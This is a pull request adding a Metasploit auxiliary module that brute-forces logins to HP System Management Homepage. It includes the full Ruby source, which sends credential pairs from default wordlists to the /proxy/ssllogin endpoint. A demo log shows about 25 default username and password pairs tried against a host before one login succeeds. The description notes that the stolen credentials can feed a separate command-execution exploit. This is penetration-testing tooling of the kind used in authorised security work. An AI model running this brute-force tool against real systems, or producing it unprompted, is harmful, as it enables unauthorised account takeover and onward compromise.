### PR TITLE
Add HP System Management Homepage Login Utility

### DIFF
--- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
+++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
@@ -1,0 +1,103 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Auxiliary::Report
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::AuthBrute
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "HP System Management Homepage Login Utility",
+			'Description'    => %q{
+				This module attempts to login to HP System Management Homepage using host
+				operating system authentication.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'sinn3r' ],
+			'DefaultOptions' => { 'SSL' => true }
+		))
+
+		register_options(
+			[
+				Opt::RPORT(2381),
+				OptPath.new('USERPASS_FILE',  [ false, "File containing users and passwords separated by space, one pair per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_userpass.txt") ]),
+				OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_users.txt") ]),
+				OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "http_default_pass.txt") ]),
+			], self.class)
+	end
+
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+	def anonymous_access?
+		res = send_request_raw({'uri' => '/'})
+		return true if res and res.body =~ /username = "hpsmh_anonymous"/
+		false
+	end
+
+	def do_login(user, pass)
+		begin
+			res = send_request_cgi({
+				'method' => 'POST',
+				'uri'    => '/proxy/ssllogin',
+				'vars_post' => {
+					'redirecturl'         => '',
+					'redirectquerystring' => '',
+					'user'                => user,
+					'password'            => pass
+				}
+			})
+
+			if not res
+				print_error("#{peer} - Connection timed out")
+				return :abort
+			end
+		rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
+			print_error("#{peer} - Failed to response")
+			return :abort
+		end
+
+		if res.headers['CpqElm-Login'].to_s =~ /success/
+			print_good("#{peer} - Successful login: '#{user}:#{pass}'")
+			report_auth_info({
+				:host  => rhost,
+				:port  => rport,
+				:sname => 'https',
+				:user  => user,
+				:pass  => pass,
+				:proof => "CpqElm-Login: #{res.headers['CpqElm-Login']}"
+			})
+
+			return :next_user
+		end
+	end
+
+
+	def run
+		if anonymous_access?
+			print_status("#{peer} - No login necessary. Server allows anonymous access.")
+			return
+		end
+
+		each_user_pass { |user, pass|
+			# Actually respect the BLANK_PASSWORDS option
+			next if not datastore['BLANK_PASSWORDS'] and pass.blank?
+
+			vprint_status("#{peer} - Trying: '#{user}:#{pass}'")
+			do_login(user, pass)
+		}
+	end
+end

--- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
+++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
@@ -101,3 +101,7 @@ class Metasploit3 < Msf::Auxiliary
 		}
 	end
 end
+
+=begin
+Tested: v6.3.1.24 upto v7.2.1.3
+=end


### PR DESCRIPTION
This module is used to login to HP System Management Homepage.  The software uses Windows accounts for auth, so it's useful to brute-force them.  A stolen credential can also be used for exploit hp_sys_mgmt_exec.rb.  Tested versions: v6.3.1.24 upto v7.2.1.3.  Downloads older than 6.3.1.24 are password-protected, so can't test those.

Archive can be found here:
http://goo.gl/ot68q

Demo:

```
msf auxiliary(hp_sys_mgmt_login) > run

[*] 10.0.1.8:2381 HP_SYS_MGMT - [002/275] - Trying: 'admin:admin'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [003/275] - Trying: 'manager:manager'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [004/275] - Trying: 'root:root'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [005/275] - Trying: 'cisco:cisco'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [006/275] - Trying: 'apc:apc'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [007/275] - Trying: 'pass:pass'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [008/275] - Trying: 'security:security'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [009/275] - Trying: 'user:user'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [010/275] - Trying: 'system:system'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [011/275] - Trying: 'sys:sys'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [012/275] - Trying: 'wampp:wampp'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [013/275] - Trying: 'newuser:newuser'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [014/275] - Trying: 'xampp-dav-unsecure:xampp-dav-unsecure'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [015/275] - Trying: 'connect:connect'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [016/275] - Trying: 'sitecom:sitecom'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [017/275] - Trying: 'private:private'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [018/275] - Trying: 'administrator:administrator'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [019/275] - Trying: 'admin:1234'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [020/275] - Trying: 'cisco:sanfran'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [021/275] - Trying: 'wampp:xampp'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [022/275] - Trying: 'newuser:wampp'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [023/275] - Trying: 'xampp-dav-unsecure:ppmax2011'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [024/275] - Trying: 'admin:turnkey'
[*] 10.0.1.8:2381 HP_SYS_MGMT - [025/275] - Trying: 'administrator:holamundo'
[+] 10.0.1.8:2381 - Successful login: 'administrator:holamundo'
[*] Auxiliary module execution completed
msf auxiliary(hp_sys_mgmt_login) >
```
